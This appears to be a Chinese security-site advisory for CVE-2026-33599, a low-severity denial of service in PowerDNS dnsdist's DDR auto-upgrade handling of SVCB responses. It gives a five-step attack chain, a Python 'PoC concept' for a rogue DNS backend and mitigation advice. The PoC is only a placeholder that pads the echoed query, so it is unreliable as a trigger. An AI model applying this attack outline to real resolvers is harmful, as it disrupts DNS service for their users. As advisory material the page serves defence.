CVE-2026-33599 CVSS 3.1 低危

CVE-2026-33599 PowerDNS dnsdist SVCB响应拒绝服务漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33599

漏洞类型

拒绝服务

CVSS评分

3.1 低危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PowerDNS dnsdist

漏洞概述

PowerDNS dnsdist在处理指定解析器发现（DDR）请求时存在安全漏洞。当配置中启用了autoUpgrade（Lua）或auto_upgrade（YAML）选项时，恶意的后端服务器可以发送精心制作的SVCB响应数据包。由于dnsdist在处理该响应时存在逻辑缺陷，可能导致服务可用性受到影响。值得注意的是，DDR升级功能在默认配置下是关闭的，因此只有显式启用该功能的用户才会受到影响。

技术细节

该漏洞属于输入验证错误导致的拒绝服务漏洞。漏洞触发条件较为特定，需要攻击者能够控制dnsdist所请求的后端服务器（邻接网络攻击向量）。当dnsdist尝试通过DDR机制自动升级解析器时，会向后端发送请求并期待SVCB格式的响应。攻击者利用此机会发送格式错误或恶意的SVCB记录，可能触发dnsdist的解析异常，导致进程崩溃或资源耗尽。由于CVSS向量为AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L，主要影响可用性，且利用复杂度较高（AC:H），风险等级被评定为低危。

攻击链分析

STEP 1

1. 环境准备

攻击者处于目标dnsdist服务器的邻接网络中，能够拦截或控制dnsdist配置的后端服务器。

STEP 2

2. 配置探测

确认目标dnsdist已启用autoUpgrade（Lua）或auto_upgrade（YAML）功能。

STEP 3

3. 触发请求

dnsdist根据配置向受控的后端发送指定解析器发现（DDR）请求。

STEP 4

4. 发送恶意响应

后端向dnsdist返回精心构造的恶意SVCB响应数据包。

STEP 5

5. 漏洞触发

dnsdist解析恶意SVCB响应时发生错误，导致服务拒绝或异常终止。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept: Malicious DNS Backend responding to DDR/SVCB
import socket

# Create a raw socket to simulate a DNS server
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', 53))

print("Listening for DNS queries (simulating rogue backend)...")

while True:
    data, addr = sock.recvfrom(1024)
    print(f"Received query from {addr}")
    
    # Simplified logic: Check if it looks like a DDR query (logic omitted for brevity)
    # Construct a malicious SVCB response
    # This is a placeholder for the specific crafted packet structure
    # that triggers the vulnerability in CVE-2026-33599
    
    # Response header (standard DNS response flags)
    response_header = b'\x84\x00' # Response, Authoritative
    
    # In a real exploit, the payload would be a specifically malformed SVCB record
    # causing the crash in dnsdist.
    # Example payload structure (Hypothetical):
    # Transaction ID + Flags + Questions + Answer RRs + Authority RRs + Additional RRs
    # Followed by the malformed SVCB record.
    
    malicious_payload = data[:2] + response_header + data[4:] + b'\x00' * 10
    
    sock.sendto(malicious_payload, addr)

影响范围

PowerDNS dnsdist (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施

建议用户检查dnsdist配置，暂时禁用DDR自动升级功能（autoUpgrade/auto_upgrade），直到应用安全补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表